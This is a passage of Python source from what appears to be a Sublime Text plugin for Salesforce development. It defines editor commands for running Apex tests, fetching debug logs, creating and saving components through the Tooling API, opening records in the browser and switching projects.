return util.check_action_enabled()
class ExportRoleHierarchyCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportRoleHierarchyCommand, self).__init__(*args, **kwargs)
def run(self):
processor.handle_export_role_hierarchy()
def is_enabled(self):
return util.check_action_enabled()
class DescribeSobjectCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DescribeSobjectCommand, self).__init__(*args, **kwargs)
def run(self):
sobjects_describe = util.populate_sobjects_describe()
self.sobjects = sorted(sobjects_describe.keys())
self.window.show_quick_panel(self.sobjects, self.on_done)
def on_done(self, index):
if index == -1: return
processor.handle_describe_sobject(self.sobjects[index])
class ExportWorkbookCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportWorkbookCommand, self).__init__(*args, **kwargs)
def run(self):
self.window.show_input_panel("Input Sobjects(* or sobjects separated with semi-colon), Case is Sensitive",
"*", self.on_input, None, None)
def on_input(self, input):
# Display the fields in a new view
input = input.replace(" ", "")
if input == "*":
processor.handle_export_all_workbooks(5)
else:
# Collect the sobjects
sobjects = input.split(";")
# Check whether the input sobjects are valid
# If any one is not valid, allow user to input again
sobjects_describe = util.populate_sobjects_describe()
if not sobjects_describe: return
for sobject in sobjects:
if sobject not in sobjects_describe:
message = '"%s" is not valid sobject, do you want to try again?' % sobject
if not sublime.ok_cancel_dialog(message, "Continue?"): return
self.window.show_input_panel("Sobjects(* means all, or sobjects seprated with semi-colon)",
input, self.on_input, None, None)
return
# After ensured input is valid, just start to generate workbooks
processor.handle_export_specified_workbooks(sobjects)
def is_enabled(self):
return util.check_action_enabled()
class ViewComponentInSfdcCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ViewComponentInSfdcCommand, self).__init__(*args, **kwargs)
def run(self):
self.all_components = util.populate_all_components()
if not self.all_components:
Printer.get("error").write("No components cache")
return
self.all_components_name = sorted(list(self.all_components.keys()))
self.window.show_quick_panel(self.all_components_name, self.on_done)
def on_done(self, index):
if index == -1: return
class_id = self.all_components[self.all_components_name[index]]
startURL = "/" + class_id
self.window.run_command("login_to_sfdc", {"startURL": startURL})
class PreviewPageCommand(sublime_plugin.TextCommand):
def run(self, view):
startURL = "/apex/" + self.attributes["name"]
self.view.window().run_command("login_to_sfdc", {"startURL": startURL})
def is_visible(self):
if not self.view.file_name(): return False
self.attributes = util.get_file_attributes(self.view.file_name())
if not self.attributes["extension"]: return False
if self.attributes["extension"] != "page": return False
return util.check_enabled(self.view.file_name())
class RunOneTestCommand(sublime_plugin.WindowCommand):
""" List the test classes from local cache, after any one is chosen,
get the attribute of the chosen class and run test,
Cache structure is shown as below:
{
"ApexClass":
{
"accountcontroller":
{
"body": "Body",
"extension": ".cls",
"id": "01p90000003hdEGAAY",
"is_test": false,
"name": "AccountController",
"type": "ApexClass",
"url": "/services/data/v30.0/sobjects/ApexClass/01p90000003hdEGAAY"
},
...
},
...
}
"""
def __init__(self, *args, **kwargs):
super(RunOneTestCommand, self).__init__(*args, **kwargs)
def run(self):
self.classes_attr = util.populate_components("ApexClass")
self.classmap = {}
for key in self.classes_attr:
if not self.classes_attr[key]["is_test"]: continue
self.classmap[self.classes_attr[key]["name"]] = key
if not self.classmap:
Printer.get('error').write("No Test Class");
return
self.class_names = sorted(list(self.classmap.keys()))
self.window.show_quick_panel(self.class_names, self.on_done)
def on_done(self, index):
if index == -1: return
class_name = self.class_names[index]
key = self.classmap[class_name]
class_id = self.classes_attr[key]["id"]
processor.handle_run_test(class_name, class_id)
class FetchOrgWideCoverageCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(FetchOrgWideCoverageCommand, self).__init__(*args, **kwargs)
def run(self):
pass
class ChooseTestClasses(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ChooseTestClasses, self).__init__(*args, **kwargs)
def run(self, callback_options={}):
self.callback_options = callback_options
if not hasattr(self, "chosen_classes"):
self.chosen_classes = []
# Get all classes
self.classes_attr = util.populate_components("ApexClass")
self.classmap = {}
selected_items = [];
unselected_items = []
for key, item in self.classes_attr.items():
if not item["is_test"]:
continue
if "namespacePrefix" in item and item["namespacePrefix"]:
cname = "%s.%s" % (
item["namespacePrefix"], item["name"]
)
else:
cname = item["name"]
classItem = "%s[%s] %s" % (
" " * 4,
"√" if cname in self.chosen_classes else "x",
cname
)
if cname in self.chosen_classes:
selected_items.append(classItem)
else:
unselected_items.append(classItem)
self.classmap[classItem] = cname
if not self.classmap:
settings = context.get_settings()
return Printer.get('error').write(
"No available test class in {org_name} org".format(
org_name=settings["default_project_name"]
)
);
# Add `All` Item
allItem = "[%s] All" % (
"√" if self.chosen_classes else "x"
)
self.items = [allItem]
# Add class items
selected_items = sorted(selected_items)
unselected_items = sorted(unselected_items)
self.items.extend(selected_items)
self.items.extend(unselected_items)
selected_index = 0
if hasattr(self, "index"):
selected_index = self.index
self.window.show_quick_panel(self.items, self.on_done,
sublime.MONOSPACE_FONT, selected_index)
def on_done(self, index):
if index == -1:
callback_command = self.callback_options["callback_command"]
if self.chosen_classes:
args = self.callback_options.get("args", {})
args["chosen_classes"] = self.chosen_classes
return sublime.active_window().run_command(
callback_command, args
)
if callback_command == "deploy_package":
Printer.get("error").write(
"You should choose at least one test class"
)
return
self.index = index
chosen_item = self.items[index]
if chosen_item.endswith(" All"):
if len(self.chosen_classes) == len(self.items) - 1:
self.chosen_classes = []
else:
self.chosen_classes = []
for k, v in self.classmap.items():
if v == "*": continue
self.chosen_classes.append(v)
else:
class_attr = self.classmap[chosen_item]
class_name = class_attr
if class_name in self.chosen_classes:
self.chosen_classes.remove(class_name)
else:
self.chosen_classes.append(class_name)
sublime.set_timeout_async(lambda: self.run(
callback_options=self.callback_options
), 10)
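# Re-running the command from set_timeout_async re-opens the quick panel at the last
# chosen index so the user can keep toggling classes; cancelling the panel
# (index == -1) finally hands the accumulated self.chosen_classes to the callback command.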
class RunSyncTests(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(RunSyncTests, self).__init__(*args, **kwargs)
def run(self, chosen_classes=[]):
if not chosen_classes:
return self.window.run_command('choose_test_classes', {
"callback_options": {
"callback_command": "run_sync_tests"
}
})
processor.handle_run_sync_test(chosen_classes)
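# Example invocation (the class name below is illustrative only):
#   window.run_command("run_sync_tests", {"chosen_classes": ["AccountControllerTest"]})
# With an empty chosen_classes the command first opens choose_test_classes, which
# calls back into run_sync_tests with whatever classes the user toggled.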
class RunSyncTest(sublime_plugin.TextCommand):
def run(self, edit):
tests = [];
for region in self.view.sel():
sel = self.view.substr(self.view.word(region.begin()))
if sel and not sel.isspace():
tests.append(sel.strip())
processor.handle_run_sync_test([self.cname], tests)
def is_enabled(self):
# Get current file name and Read file content
file_name = self.view.file_name()
if not file_name or not file_name.endswith(".cls"):
return False
if not util.check_enabled(file_name):
return False
# The current file must be an Apex class
body = open(file_name, "rb").read()
# A test class must contain "testMethod" or the @isTest annotation
lower_body = body.lower()
if b"testmethod" not in lower_body and b"@istest" not in lower_body:
return False
component_attribute, self.cname = util.get_component_attribute(file_name)
if "namespacePrefix" in component_attribute and \
component_attribute["namespacePrefix"]:
self.cname = "%s.%s" % (
component_attribute["namespacePrefix"],
self.cname
)
for region in self.view.sel():
sel = self.view.substr(self.view.word(region.begin()))
if sel and not sel.isspace() and not re.compile(r'^[a-zA-Z0-9_]*$').match(sel.strip()):
return False
return True
def is_visible(self):
return self.is_enabled()
class RunAsyncTest(sublime_plugin.WindowCommand):
"""
@deprecated
"""
def __init__(self, *args, **kwargs):
super(RunAsyncTest, self).__init__(*args, **kwargs)
def run(self, files):
processor.handle_run_async_test_classes(self.class_ids)
def is_enabled(self, files):
# Check whether any classes are chosen
if len(files) == 0: return False
# Check whether there are test class in chosen classes
self.class_ids = []
for f in files:
component_attribute, name = util.get_component_attribute(f)
if not component_attribute or not component_attribute["is_test"]:
continue
self.class_ids.append(component_attribute["id"])
return len(self.class_ids) > 0
def is_visible(self):
return self.is_enabled()
class RunTestCommand(sublime_plugin.TextCommand):
"""
Run Async Test
"""
def run(self, view):
# Get component_attribute by file_name
attributes = util.get_file_attributes(self.view.file_name())
component_attribute = util.get_component_attribute(self.view.file_name())[0]
# Process run test
processor.handle_run_test(attributes["name"], component_attribute["id"])
def is_enabled(self):
# Get current file name and Read file content
file_name = self.view.file_name()
if not file_name or not file_name.endswith(".cls"):
return False
if not util.check_enabled(file_name):
return False
# The current file must be an Apex class
body = open(file_name, "rb").read()
# A test class must contain "testMethod" or the @isTest annotation
lower_body = body.lower()
if b"testmethod" not in lower_body and b"@istest" not in lower_body:
return False
return True
def is_visible(self):
return self.is_enabled()
class TrackAllDebugLogs(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(TrackAllDebugLogs, self).__init__(*args, **kwargs)
def run(self):
users = processor.handle_populate_users("track_all_debug_logs")
if not users: return
if sublime.ok_cancel_dialog("Confirm to track logs for all users?", "Continue"):
processor.handle_track_all_debug_logs_thread(users)
class TrackDebugLog(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(TrackDebugLog, self).__init__(*args, **kwargs)
def run(self, track_self=False):
if track_self:
processor.handle_create_debug_log('Me', None)
return
self.users = processor.handle_populate_users("track_debug_log")
if not self.users: return
self.users_name = sorted(self.users.keys(), reverse=False)
self.window.show_quick_panel(self.users_name, self.on_done)
def on_done(self, index):
if index == -1: return
user_name = self.users_name[index]
user_id = self.users[user_name]
processor.handle_create_debug_log(user_name, user_id)
class FetchDebugLogCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(FetchDebugLogCommand, self).__init__(*args, **kwargs)
def run(self, fetch_self=False):
if fetch_self:
processor.handle_fetch_debug_logs('Me', None)
return
self.users = processor.handle_populate_users("fetch_debug_log")
if not self.users: return # Network Issue Cause
self.users_name = sorted(self.users.keys(), reverse=False)
self.window.show_quick_panel(self.users_name, self.on_done)
def on_done(self, index):
if index == -1: return
user_name = self.users_name[index]
user_id = self.users[user_name]
processor.handle_fetch_debug_logs(user_name, user_id)
class ViewDebugLogDetail(sublime_plugin.TextCommand):
def run(self, view):
processor.handle_view_debug_log_detail(self.log_id)
def is_enabled(self):
# Choose the valid Id, you will see this command
# make sure selection has region in it
if len(self.view.sel()) == 0:
return False
region = self.view.sel()[0]
self.log_id = self.view.substr(self.view.word(region.begin()))
if len(self.log_id) != 15 and len(self.log_id) != 18: return False
if not re.compile(r'^[a-zA-Z0-9]*$').match(self.log_id): return False
if not self.log_id.startswith("07L"): return False
return True
class ViewCodeCoverageAfterSyncTest(sublime_plugin.TextCommand):
def run(self, edit):
# get code coverage cache
settings = context.get_settings()
work_dir = os.path.join(settings["workspace"])
cache_file = os.path.join(work_dir, ".config", "coverage.json")
if not os.path.isfile(cache_file):
return
coverages = json.loads(open(cache_file).read())
record = coverages.get(self.file_name)
# get file content, may be apex class or trigger
class_path = os.path.join(work_dir, 'src',
'classes', self.file_name + '.cls')
trigger_path = os.path.join(work_dir, 'src',
'triggers', self.file_name + '.trigger')
_path = class_path if os.path.isfile(class_path) else trigger_path
if not os.path.isfile(_path):
return
with open(_path, encoding="utf-8") as fp:
file_content = fp.read()
if record and record.get("Coverage"):
util.view_coverage(self.file_name, record, file_content)
def is_enabled(self):
if len(self.view.sel()) == 0 or self.view.name() != 'Test Result':
return False
region = self.view.sel()[0]
# Make sure only enable for classes or triggers
start_reg = self.view.find('Trigger Or Class Code Coverage:', 0)
start_r, _ = self.view.rowcol(start_reg.begin())
r, _ = self.view.rowcol(region.begin())
if r - start_r < 4:
return False
self.file_name = self.view.substr(self.view.word(region.begin()))
if not re.compile(r'^[\w]+$').match(self.file_name):
return False
return self.file_name and self.file_name[0].isalpha()
def is_visible(self):
return self.view.name() == 'Test Result'
class ViewDebugOnly(sublime_plugin.TextCommand):
def run(self, view):
whole_region = sublime.Region(0, self.view.size())
debug_content = []
for line in self.view.lines(whole_region):
line_content = self.view.substr(line)
if "|USER_DEBUG|" in line_content:
debug_content.append(line_content)
self.view.window().run_command("new_dynamic_view", {
"view_id": self.view.id(),
"view_name": self.view.name(),
"point": 0,
"erase_all": True,
"input": "\n".join(debug_content)
})
def is_enabled(self):
return self.view.settings().get("is_debug_log") is True
class ExecuteQuery(sublime_plugin.TextCommand):
def run(self, view):
sublime.active_window().run_command("haoku", {
"router": "query?param=" + self.selection
})
def is_enabled(self):
# The selection must start with SELECT,
# otherwise this command is not enabled
self.selection = self.view.substr(self.view.sel()[0])
if not self.selection or not self.selection.upper().startswith("SELECT"):
return False
return True
class ExecuteAnonymousCommand(sublime_plugin.TextCommand):
def run(self, view):
processor.handle_execute_anonymous(self.selection)
def is_enabled(self):
# Enabled only if there is a non-empty selection
self.selection = self.view.substr(self.view.sel()[0])
if not self.selection: return False
return True
class ViewIdInSfdcWebCommand(sublime_plugin.TextCommand):
def run(self, view):
startURL = "/" + self.record_id
if self.record_id.startswith("012"):
startURL = "/setup/ui/recordtypefields.jsp?id=" + self.record_id
if self.record_id.startswith("07L"):
startURL = "/p/setup/layout/ApexDebugLogDetailEdit/d?apex_log_id=" + self.record_id
self.view.window().run_command("login_to_sfdc", {"startURL": startURL})
def is_enabled(self):
# This command is enabled only when a valid record Id is selected
if util.is_python3x():
self.record_id = self.view.substr(self.view.sel()[0])
else:
self.record_id = self.view.substr(self.view.sel()[0]).encode("utf-8")
if len(self.record_id) != 15 and len(self.record_id) != 18:
return False
if not re.compile(r'^[a-zA-Z0-9]*$').match(self.record_id):
return False
return True
class ShowInSfdcWebCommand(sublime_plugin.TextCommand):
def run(self, view):
# Get file_name and component_attribute
component_attribute = util.get_component_attribute(self.view.file_name())[0]
# Open this component in salesforce web
startURL = "/" + component_attribute["id"]
self.view.window().run_command("login_to_sfdc", {"startURL": startURL})
def is_enabled(self):
return util.check_enabled(self.view.file_name())
class LoginToSfdcCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(LoginToSfdcCommand, self).__init__(*args, **kwargs)
def run(self, startURL="", copy_url=False):
# Get toolingapi settings
settings = context.get_settings()
session = util.get_session_info(settings)
# If .config/session.json does not exist, log in first
if not session:
return self.window.run_command('login',
{
"callback_options": {
"callback_command": "login_to_sfdc",
"args": {
"startURL": startURL
}
}
}
)
# If .config/session.json exists, use the frontdoor method
show_url = "%s/secur/frontdoor.jsp?sid=%s&retURL=%s" % (
session["instance_url"], session["session_id"], startURL
)
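# The resulting URL has the shape (values illustrative only):
#   https://<instance>.salesforce.com/secur/frontdoor.jsp?sid=<session_id>&retURL=/<record_or_page>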
if not copy_url:
return util.open_with_browser(show_url)
sublime.set_clipboard(show_url)
class AboutCommand(sublime_plugin.ApplicationCommand):
def run(command):
package_info = sublime.load_settings("package.sublime-settings")
version_info = "\n%s\n\n%s\n\nCopyright © 2013-2019 By %s\n\tDev Channel, Build v%s" % (
package_info.get("description"),
package_info.get("homepage"),
package_info.get("author"),
package_info.get("version")
)
sublime.message_dialog(version_info)
class ReportIssueCommand(sublime_plugin.ApplicationCommand):
def run(command):
package_info = sublime.load_settings("package.sublime-settings")
util.open_with_browser(package_info.get("issue_url"))
class HaoideHelp(sublime_plugin.ApplicationCommand):
def run(command, url=""):
package_info = sublime.load_settings("package.sublime-settings")
util.open_with_browser(package_info.get("homepage") + url)
class ReleaseNotesCommand(sublime_plugin.ApplicationCommand):
def run(command):
package_info = sublime.load_settings("package.sublime-settings")
util.open_with_browser(package_info.get("history_url"))
class DeleteFilesFromServer(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DeleteFilesFromServer, self).__init__(*args, **kwargs)
def run(self, files):
# Confirm Delete Action
if sublime.ok_cancel_dialog("Confirm to delete?"):
for f in files:
component_attribute = util.get_component_attribute(f)[0]
processor.handle_delete_component(component_attribute["url"], f)
def is_visible(self, files):
"""
1. At least one file must be selected
2. All selected files should be visible
"""
if len(files) == 0: return False
self._files = [f for f in files if not f.endswith("-meta.xml")]
if len(self._files) == 0: return False
for _file in self._files:
attr = util.get_component_attribute(_file)[0]
if not attr or "url" not in attr:
return False
return True
class DeleteFileFromServer(sublime_plugin.TextCommand):
def run(self, view):
files = [self.view.file_name()]
self.view.window().run_command("delete_files_from_server", {
"files": files
})
def is_enabled(self):
self.file_name = self.view.file_name()
if not self.file_name: return False
if self.file_name.endswith("-meta.xml"): return False
attr = util.get_component_attribute(self.file_name)[0]
if not attr or "url" not in attr:
return False
return True
def is_visible(self):
return self.is_enabled()
class CreateApexTriggerCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CreateApexTriggerCommand, self).__init__(*args, **kwargs)
def run(self):
sobjects_describe = util.populate_sobjects_describe()
self.sobjects = sorted([name for name in sobjects_describe \
if "triggerable" in sobjects_describe[name] and sobjects_describe[name]["triggerable"]])
self.window.show_quick_panel(self.sobjects, self.on_done)
def on_done(self, index):
if index == -1: return
self.window.run_command("create_component", {
"component_type": "ApexTrigger",
"markup_or_body": "Body",
"sobject_name": self.sobjects[index]
})
def is_enabled(self):
return util.check_action_enabled()
class CreateApexPageCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CreateApexPageCommand, self).__init__(*args, **kwargs)
def run(self):
self.window.run_command("create_component", {
"component_type": "ApexPage",
"markup_or_body": "Markup"
})
def is_enabled(self):
return util.check_action_enabled()
class CreateApexComponentCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CreateApexComponentCommand, self).__init__(*args, **kwargs)
def run(self):
self.window.run_command("create_component", {
"component_type": "ApexComponent",
"markup_or_body": "Markup"
})
def is_enabled(self):
return util.check_action_enabled()
class CreateApexClassCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CreateApexClassCommand, self).__init__(*args, **kwargs)
def run(self):
self.window.run_command("create_component", {
"component_type": "ApexClass",
"markup_or_body": "Body"
})
def is_enabled(self):
return util.check_action_enabled()
class CreateStaticResource(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CreateStaticResource, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
self.content_types = settings["content_types"]
self.window.show_quick_panel(self.content_types, self.on_choose)
def on_choose(self, index):
if index == -1: return
self.content_type = self.content_types[index]
self.input_name_message = "Please Input StaticResource Name: "
self.window.show_input_panel(self.input_name_message,
"", self.on_input_name, None, None)
def on_input_name(self, input):
# Create the component locally according to the user input
if not re.match('^[a-zA-Z]+\\w+$', input):
message = 'Invalid name, do you want to try again?'
if not sublime.ok_cancel_dialog(message, "Try Again?"): return
self.window.show_input_panel(self.input_name_message,
"", self.on_input_name, None, None)
return
self.resource_name = input
# Input file location
self.input_location_message = "Please Input File or Path for StaticResource: "
self.window.show_input_panel(self.input_location_message,
"", self.on_input_location, None, None)
def on_input_location(self, location):
# Get the file or path from user input; allow trying again
if not os.path.exists(location) and not os.path.isfile(location):
if not sublime.ok_cancel_dialog("Invalid file or path", "Try Again?"):
return
self.window.show_input_panel(self.input_location_message,
"", self.on_input_location, None, None)
return
if os.path.isfile(location):
body = open(location, "r").read()
data = {
"Name": self.resource_name,
"ContentType": self.content_type,
"CacheControl": "Private",
"Body": body
}
processor.handle_create_static_resource(data)
def is_enabled(self):
return util.check_action_enabled()
class CreateComponentCommand(sublime_plugin.WindowCommand):
"""
Create Apex Class/Trigger/Page/Component via Tooling API
"""
def __init__(self, *args, **kwargs):
super(CreateComponentCommand, self).__init__(*args, **kwargs)
def run(self, template_name=None,
component_name=None,
component_type=None,
markup_or_body=None,
sobject_name=None):
self.template_name = template_name
self.component_name = component_name
self.component_type = component_type
self.markup_or_body = markup_or_body
self.sobject_name = sobject_name
self.templates = util.load_templates()
templates = self.templates[self.component_type]
self.template_names = [[n, templates[n]["description"]] for n in templates]
self.template_names = sorted(self.template_names)
# After typing # in a Visualforce page we already have
# the component name and template name, so there is no need to choose again
if self.component_name and self.template_name:
self.template_attr = templates[self.template_name]
self.create_component()
else:
# If the component type is ApexTrigger, we need to choose both the sObject and the template;
# however, the Sublime quick panel is unavailable for a second, chained choose panel,
if self.component_type == "ApexTrigger" or len(self.template_names) == 1:
self.on_choose_template(0)
else:
self.window.show_quick_panel(self.template_names, self.on_choose_template)
def on_choose_template(self, index):
if index == -1: return
self.template_name = self.template_names[index][0]
self.template_attr = self.templates[self.component_type][self.template_name]
if self.component_name:
self.create_component()
else:
message = "Please Input %s Name %s: " % (
self.component_type,
"for %s" % self.sobject_name if self.component_type == "ApexTrigger" else ""
)
self.window.show_input_panel(message, "", self.on_input, None, None)
def on_input(self, input):
# Create the component locally according to the user input
if not re.match('^[a-zA-Z]+\\w+$', input):
message = 'Invalid format, do you want to try again?'
if not sublime.ok_cancel_dialog(message, "Try Again?"): return
self.window.show_input_panel("Please Input Name: ", "", self.on_input, None, None)
return
self.component_name = input
self.create_component()
def create_component(self):
self.settings = context.get_settings()
workspace = self.settings["workspace"]
extension = self.template_attr["extension"]
directory = self.template_attr["directory"]
with open(os.path.join(workspace, ".templates", directory)) as fp:
body = fp.read()
if extension == ".trigger":
body = body.replace("Trigger_Name__c", self.component_name).replace("Sobject_Name__c", self.sobject_name)
elif extension == ".cls":
body = body.replace("Class_Name__c", self.component_name)
component_outputdir = os.path.join(workspace, "src", self.settings[self.component_type]["directoryName"])
if not os.path.exists(component_outputdir):
os.makedirs(component_outputdir)
self.settings = context.get_settings()
util.add_project_to_workspace(self.settings)
file_name = "%s/%s" % (component_outputdir, self.component_name + extension)
if os.path.isfile(file_name):
_message = '"%s" is already exist, do you want to try again?' % self.component_name
if not sublime.ok_cancel_dialog(_message, "Continue?"):
self.window.open_file(file_name)
return
self.window.show_input_panel("Please Input Name: ", "", self.on_input, None, None)
return
with open(file_name, "w") as fp:
fp.write(body)
# On Windows, the new file is not shown in the sidebar,
# so we need to refresh the Sublime workspace to show it
sublime.active_window().run_command("refresh_folder_list")
# Build Post body
data = {
"name": self.component_name,
self.markup_or_body: body
}
if self.component_type == "ApexClass":
data["IsValid"] = True
elif self.component_type == "ApexTrigger":
data["TableEnumOrId"] = self.sobject_name
elif self.component_type in ["ApexPage", "ApexComponent"]:
data["MasterLabel"] = self.component_name
processor.handle_create_component(data, self.component_name,
self.component_type,
self.markup_or_body,
file_name)
class SaveToServer(sublime_plugin.TextCommand):
"""
Save Metadata to Server using Tooling API
"""
def run(self, edit, is_check_only=False):
# Check whether confirmation is required before saving
settings = context.get_settings()
if settings["confirm_on_save"]:
message = "Confirm to continue save operation?"
if not sublime.ok_cancel_dialog(message, "Save to Server?"):
return
# Automatically save current file if dirty
if self.view.is_dirty():
self.view.run_command("save")
# Handle Save Current Component
processor.handle_save_to_server(self.view.file_name(), is_check_only)
def is_enabled(self):
if not self.view or not self.view.file_name():
return False
attributes = util.get_file_attributes(self.view.file_name())
if attributes["metadata_folder"] not in ["classes", "components", "pages", "triggers", "aura", "lwc"]:
return False
return util.check_enabled(self.view.file_name())
def is_visible(self):
return self.is_enabled()
class ViewFileAttributes(sublime_plugin.TextCommand):
def run(self, edit):
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": self.cname + " Attributes",
"input": json.dumps(self.component_attribute, indent=4)
})
def is_enabled(self):
if not self.view or not self.view.file_name(): return False
self.file_name = self.view.file_name()
self.settings = context.get_settings()
self.component_attribute, self.cname = util.get_component_attribute(self.file_name)
if not self.component_attribute:
return False
return True
class SwitchProjectCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(SwitchProjectCommand, self).__init__(*args, **kwargs)
def run(self, callback_options={}):
self.callback_options = callback_options
settings = context.get_settings()
projects = {}
for k, v in settings["projects"].items():
if not v.get("hidden_in_project_list", False):
projects[k] = v
self.projects = ["(" + ('Active' if projects[p]["default"] else
'Inactive') + ") " + p for p in projects]
self.projects = sorted(self.projects, reverse=False)
self.window.show_quick_panel(self.projects, self.on_done)
def on_done(self, index):
if index == -1: return
# Switch to chosen project
default_project = self.projects[index].split(") ")[1]
util.switch_project(default_project)
settings = context.get_settings()
described_metadata = util.get_described_metadata(settings)
if not described_metadata:
session = util.get_session_info(settings)
if not session:
return processor.handle_login_thread()
return self.window.run_command("describe_metadata", {
"callback_options": self.callback_options
})
# Execute callback command
if "callback_command" in self.callback_options:
callback_command = self.callback_options["callback_command"]
args = self.callback_options["args"] if "args" in self.callback_options else {}
self.window.run_command(callback_command, args)
class Login(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
def run(self, callback_options={}, force=False):
processor.handle_login_thread(callback_options, force=force)
class UpdateUserLanguage(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(UpdateUserLanguage, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
self.languages_settings = settings["user_language"]
self.languages = sorted(self.languages_settings.keys())
self.window.show_quick_panel(self.languages, self.on_choose)
def on_choose(self, index):
if index == -1: return
chosen_language = self.languages[index]
processor.handle_update_user_language(self.languages_settings[chosen_language])
def is_enabled(self):
return util.check_action_enabled()
class EnableDevelopmentMode(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(EnableDevelopmentMode, self).__init__(*args, **kwargs)
def run(self):
self.users = processor.handle_populate_users("enable_development_mode")
if not self.users: return # Network Issue Cause
self.users_name = sorted(self.users.keys(), reverse=False)
self.window.show_quick_panel(self.users_name, self.on_done)
def on_done(self, index):
if index == -1: return
user_name = self.users_name[index]
user_id = self.users[user_name]
processor.handle_enable_development_mode(user_id)
def is_enabled(self):
return util.check_action_enabled()
class UpdateUserPassword(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(UpdateUserPassword, self).__init__(*args, **kwargs)
def run(self):
self.users = processor.handle_populate_users("update_user_password")
if not self.users: return # Network Issue Cause
self.users_name = sorted(self.users.keys(), reverse=False)
self.window.show_quick_panel(self.users_name, self.on_done)
def on_done(self, index):
if index == -1: return
user_name = self.users_name[index]
self.user_id = self.users[user_name]
sublime.active_window().show_input_panel("Input New Password: ",
"", self.on_input, None, None)
def on_input(self, password):
if not re.match(r'[\s\S]{5,22}', password):
message = 'Invalid password, do you want to try again?'
if not sublime.ok_cancel_dialog(message, "Try Again?"): return
return sublime.active_window().show_input_panel("Input New Password: ",
"", self.on_input, None, None)
processor.handle_update_user_password(self.user_id, password)
def is_enabled(self):
return util.check_action_enabled()
class UpdateProjectPatternsCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(UpdateProjectPatternsCommand, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
util.add_project_to_workspace(settings)
def is_enabled(self):
return util.check_action_enabled()
class UpdateProjectCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(UpdateProjectCommand, self).__init__(*args, **kwargs)
def run(self):
message = "Are you sure you really want to update this project?"
if not sublime.ok_cancel_dialog(message, "Update Project?"): return
processor.handle_new_project(is_update=True)
def is_enabled(self):
return util.check_action_enabled()
class CreateNewProject(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CreateNewProject, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
described_metadata = util.get_described_metadata(settings)
if not described_metadata:
return self.window.run_command("describe_metadata", {
"callback_options": {
"callback_command": "create_new_project"
}
})
# Check whether the default project has a subscribed_metadata_objects attribute
# and whether it contains at least one entry
if "subscribed_metadata_objects" not in settings["default_project"] or \
not settings["default_project"]["subscribed_metadata_objects"]:
return self.window.run_command("toggle_metadata_objects", {
"callback_options": {
"callback_command": "create_new_project"
}
})
dpn = settings["default_project"]["project_name"]
message = "Are you sure you really want to create new project for %s?" % dpn
if not sublime.ok_cancel_dialog(message, "Create New Project?"): return
util.add_project_to_workspace(settings)
processor.handle_new_project()
class DescribeMetadata(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DescribeMetadata, self).__init__(*args, **kwargs)
def run(self, callback_options={}):
processor.handle_describe_metadata(callback_options)
class ExtractToHere(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExtractToHere, self).__init__(*args, **kwargs)
def run(self, files):
extract_to, name = os.path.split(self._file)
name, extension = name.split(".")
extract_to = os.path.join(extract_to, name)
try:
util.extract_zipfile(self._file, extract_to)
except BaseException as ex:
return Printer.get("error").write(ex)
Printer.get("log").write_start().write("Extracted to " + extract_to)
def is_visible(self, files):
if not files or len(files) > 1:
return False
self._file = files[0]
return zipfile.is_zipfile(self._file)
class UpdateStaticResource(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(UpdateStaticResource, self).__init__(*args, **kwargs)
def run(self, dirs):
base64_package = util.compress_resource_folder(self.resource_dir)
processor.handle_deploy_thread(base64_package)
def is_visible(self, dirs):
if not dirs or len(dirs) > 1: return False
self.resource_dir = dirs[0]
static_resource_folder, resource_name = os.path.split(self.resource_dir)
if not static_resource_folder.endswith("staticresources"):
return False
return True
class RefreshFileFromServer(sublime_plugin.TextCommand):
def run(self, view):
self.view.window().run_command("refresh_files_from_server", {
"files": [self.view.file_name()]
})
def is_enabled(self):
file_name = self.view.file_name()
if not file_name: return False
attr = util.get_component_attribute(file_name)[0]
if not attr or "url" not in attr:
return False
return True
def is_visible(self):
return self.is_enabled()
class RefreshFilesFromServer(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(RefreshFilesFromServer, self).__init__(*args, **kwargs)
def run(self, files):
message = "Are you sure you really want to continue?"
if not sublime.ok_cancel_dialog(message, "Refresh Files?"): return
for file_name in files:
if file_name.endswith("-meta.xml"): continue # Ignore -meta.xml file
attr = util.get_component_attribute(file_name)[0]
# Handle Refresh Current Component
if attr["type"] == "StaticResource":
processor.handle_refresh_static_resource(attr, file_name)
else:
